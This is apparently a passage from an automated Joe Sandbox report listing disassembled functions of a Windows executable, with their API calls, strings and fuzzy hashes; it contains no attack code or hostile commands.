                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3668304517-0
                                                                                        • Opcode ID: 79c0921cd87fe934e762e48f5845e8be846b4b6500caa7e1addc831544741880
                                                                                        • Instruction ID: 5a0269969b75344211106c6437c8dca584048144c7ebaef84b37f3165c27a460
                                                                                        • Opcode Fuzzy Hash: 79c0921cd87fe934e762e48f5845e8be846b4b6500caa7e1addc831544741880
                                                                                        • Instruction Fuzzy Hash: 40410822A18B4190EE14BB39F945379A362EF5DBD8F942235EA5D077A9DF3CD4418320
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                        • String ID:
                                                                                        • API String ID: 3947729631-0
                                                                                        • Opcode ID: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                                        • Instruction ID: 2d771986d4394e70e6857ab8354fec3b4aef42a1a992445fa5c63c101c348954
                                                                                        • Opcode Fuzzy Hash: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                                        • Instruction Fuzzy Hash: 2041B421E1865386FB18FB11DC50278E261AF6CB44FC4643ADE8E976A1DF3DE841C761
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                                                        • String ID:
                                                                                        • API String ID: 680105476-0
                                                                                        • Opcode ID: 8615e64c65e08c4765cb9fe696173ca1d24e70e0804716bd186f62c3c2783a0a
                                                                                        • Instruction ID: 285cc38611731f5dc0b0ed8f5d49a7650951f1047e8106339bfae1377a5f4375
                                                                                        • Opcode Fuzzy Hash: 8615e64c65e08c4765cb9fe696173ca1d24e70e0804716bd186f62c3c2783a0a
                                                                                        • Instruction Fuzzy Hash: EC21A122A4A25185EA14AB51EA00279A354EF29BF0FE81B30DE7D47FD1DF7CE0928310
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 3215553584-0
                                                                                        • Opcode ID: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                                                                        • Instruction ID: 0686bc1a04258db0d59e03b4a84c6b530ac056aacde70a3496bcedf558d17d2f
                                                                                        • Opcode Fuzzy Hash: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                                                                        • Instruction Fuzzy Hash: A6114F36A1D64286F710AB50DC40639F2A9FF4C394FD46139E68D97796DF3CE8508720
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF70E7AF0A4: GetDlgItem.USER32 ref: 00007FF70E7AF0E3
                                                                                          • Part of subcall function 00007FF70E7AF0A4: ShowWindow.USER32 ref: 00007FF70E7AF109
                                                                                          • Part of subcall function 00007FF70E7AF0A4: SendMessageW.USER32 ref: 00007FF70E7AF11E
                                                                                          • Part of subcall function 00007FF70E7AF0A4: SendMessageW.USER32 ref: 00007FF70E7AF136
                                                                                          • Part of subcall function 00007FF70E7AF0A4: SendMessageW.USER32 ref: 00007FF70E7AF157
                                                                                          • Part of subcall function 00007FF70E7AF0A4: SendMessageW.USER32 ref: 00007FF70E7AF173
                                                                                          • Part of subcall function 00007FF70E7AF0A4: SendMessageW.USER32 ref: 00007FF70E7AF1B6
                                                                                          • Part of subcall function 00007FF70E7AF0A4: SendMessageW.USER32 ref: 00007FF70E7AF1D4
                                                                                          • Part of subcall function 00007FF70E7AF0A4: SendMessageW.USER32 ref: 00007FF70E7AF1E8
                                                                                          • Part of subcall function 00007FF70E7AF0A4: SendMessageW.USER32 ref: 00007FF70E7AF212
                                                                                          • Part of subcall function 00007FF70E7AF0A4: SendMessageW.USER32 ref: 00007FF70E7AF22A
                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70E7AFD03
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$ItemShowWindow_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 1587882848-0
                                                                                        • Opcode ID: 547a288419434c71f498dd61c948c2c3518c924996789682ab92213e3808854e
                                                                                        • Instruction ID: a6582476b5f7672c3855ec3bce530f7aa0ac447a7dae1cbbe03a349675876fd5
                                                                                        • Opcode Fuzzy Hash: 547a288419434c71f498dd61c948c2c3518c924996789682ab92213e3808854e
                                                                                        • Instruction Fuzzy Hash: 4F01DB62B1968541ED24B725D84537EA311EFDD794F902331EADC077D6DF2CE1408714
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 3668304517-0
                                                                                        • Opcode ID: 454a1fcff6e1850c8b97cdd7684a735fd34d2cefc8bc4c1965818da2daadb151
                                                                                        • Instruction ID: 5b445d1b2e933186eac6753ffa7fb36c5eefcc53240c35098dc7c6473f62c066
                                                                                        • Opcode Fuzzy Hash: 454a1fcff6e1850c8b97cdd7684a735fd34d2cefc8bc4c1965818da2daadb151
                                                                                        • Instruction Fuzzy Hash: 2D0184A2E18BC551EA15A728E845269B361FFDDB94FC06332E6DC07BA5DF2CE4408714
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF70E7B1604: GetModuleHandleW.KERNEL32(?,?,?,00007FF70E7B1573,?,?,?,00007FF70E7B192A), ref: 00007FF70E7B162B
                                                                                        • DloadProtectSection.DELAYIMP ref: 00007FF70E7B15C9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: DloadHandleModuleProtectSection
                                                                                        • String ID:
                                                                                        • API String ID: 2883838935-0
                                                                                        • Opcode ID: 902d746097657f35995c40355b3f554eba39218e3fb79a70aefbb70b68ceb6fd
                                                                                        • Instruction ID: 1d0c05f43da55ddddd3127740ae98a09af0bde117f4a42306bd253d04b0d76b5
                                                                                        • Opcode Fuzzy Hash: 902d746097657f35995c40355b3f554eba39218e3fb79a70aefbb70b68ceb6fd
                                                                                        • Instruction Fuzzy Hash: 2711BA60D0960781FB68BB05EC953B1A350AF2C34CFE82434D94E463A1EF3CA995A632
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF70E7940BC: FindFirstFileW.KERNELBASE ref: 00007FF70E79410B
                                                                                          • Part of subcall function 00007FF70E7940BC: FindFirstFileW.KERNELBASE ref: 00007FF70E79415E
                                                                                          • Part of subcall function 00007FF70E7940BC: GetLastError.KERNEL32 ref: 00007FF70E7941AF
                                                                                        • FindClose.KERNEL32(?,?,00000000,00007FF70E7A0811), ref: 00007FF70E793EFD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$FileFirst$CloseErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 1464966427-0
                                                                                        • Opcode ID: b8896e383a5d1dcda19e37a11711c970bf4128f41c8ad41a5c5cc42cc5e45b14
                                                                                        • Instruction ID: a619e7a79f05814940cca8322a7fc3121a20b4f50bdbe675b7cdef8f2439230a
                                                                                        • Opcode Fuzzy Hash: b8896e383a5d1dcda19e37a11711c970bf4128f41c8ad41a5c5cc42cc5e45b14
                                                                                        • Instruction Fuzzy Hash: 72F0AF6290828195EA14BB75E900279B7619F1EBB4F582379EA3D072C7CF28D4848765
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: File
                                                                                        • String ID:
                                                                                        • API String ID: 749574446-0
                                                                                        • Opcode ID: 7793d0dfaf1bed477703e517dfb550f1e48d00439aedf8bd4eeb9f79e866bcb3
                                                                                        • Instruction ID: ba7d0aea2ea6be02c61d68cde200d0dc230a9f94986c1ff84480d0c98915f50e
                                                                                        • Opcode Fuzzy Hash: 7793d0dfaf1bed477703e517dfb550f1e48d00439aedf8bd4eeb9f79e866bcb3
                                                                                        • Instruction Fuzzy Hash: 87E08C12A2056582FF24BB3AEC426689324AF8CB84B882030CE0C07332CF28D4C18A60
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileType
                                                                                        • String ID:
                                                                                        • API String ID: 3081899298-0
                                                                                        • Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                                        • Instruction ID: bda9f7093ab291e691e8a4acf8c315be6ea91c310ff2008a4ee4ad2c3c452b49
                                                                                        • Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                                        • Instruction Fuzzy Hash: E4D0C912909491D2E954B675EC5103C6250AF9A735FE42720D63E816F2CB1DA8D6A321
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory
                                                                                        • String ID:
                                                                                        • API String ID: 1611563598-0
                                                                                        • Opcode ID: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                                        • Instruction ID: 8a3a1b3b95f90e4b5a827b501ff5f513ece53a9b22fd2fd1da8cdba8b9d0ff38
                                                                                        • Opcode Fuzzy Hash: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                                        • Instruction Fuzzy Hash: 34C08C21F15502C1EE0C6B26CCC901813A9BF48B04FA04039C10C81120CF2CD4EB9356
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocHeap
                                                                                        • String ID:
                                                                                        • API String ID: 4292702814-0
                                                                                        • Opcode ID: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                                                        • Instruction ID: 7ade1d7985fcebe1b5197293f50360bcfcbd228d294eac38872f01a91bbc63ab
                                                                                        • Opcode Fuzzy Hash: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                                                        • Instruction Fuzzy Hash: 0CF04955B0920749FE5CBA62DD113B5D2845FAEF84F8C7430CA8E8A381EF2CA6814230
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID:
                                                                                        • API String ID: 2962429428-0
                                                                                        • Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                                        • Instruction ID: b1dddba548f832483851c2ae39075cbfe3ba39425929b727b5a9d49a8b4c4b4a
                                                                                        • Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                                        • Instruction Fuzzy Hash: BFF0A422A4868295FB24AB30F841379A670EF18B78F986335D73C011E5CF28D8A58320
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocHeap
                                                                                        • String ID:
                                                                                        • API String ID: 4292702814-0
                                                                                        • Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                                        • Instruction ID: 40990470abbb7e68d2c2697e31debfeda355998b825640715ffae4a3e231aac0
                                                                                        • Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                                        • Instruction Fuzzy Hash: D2F05811B0920745FF647AB1DC013B592959FAC7A4FC87630DFAE862C1DF2CA4808231
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
                                                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                        • API String ID: 2659423929-3508440684
                                                                                        • Opcode ID: 00964161ca9ce986acf484eb71c93c2db3db382fc2b8f17ad7e68b1fb415a3bc
                                                                                        • Instruction ID: b41b5bbcd851ed94d118f53605cbacbb6ecae34b26a5f74df48aa38304f19529
                                                                                        • Opcode Fuzzy Hash: 00964161ca9ce986acf484eb71c93c2db3db382fc2b8f17ad7e68b1fb415a3bc
                                                                                        • Instruction Fuzzy Hash: 7962E262F4864285FB00EB74D9443BDA361AF997A4F906332DA6C57AD9DF3CE185C320
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
                                                                                        • String ID: %ls$%s: %s
                                                                                        • API String ID: 2539828978-2259941744
                                                                                        • Opcode ID: 7531b1a8951024dce7d14e1856eeb041d056becd58a60b273f62812b6ec532c2
                                                                                        • Instruction ID: b40c61894d3f8fe4856b5ce88fdfdfe4e49a1a9255f4717d9a263bad7a16f2c2
                                                                                        • Opcode Fuzzy Hash: 7531b1a8951024dce7d14e1856eeb041d056becd58a60b273f62812b6ec532c2
                                                                                        • Instruction Fuzzy Hash: 22B2E762A1968241EA14BB25EC542BEE311FFDE790F942336E69D477E6EF2CE540C310
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
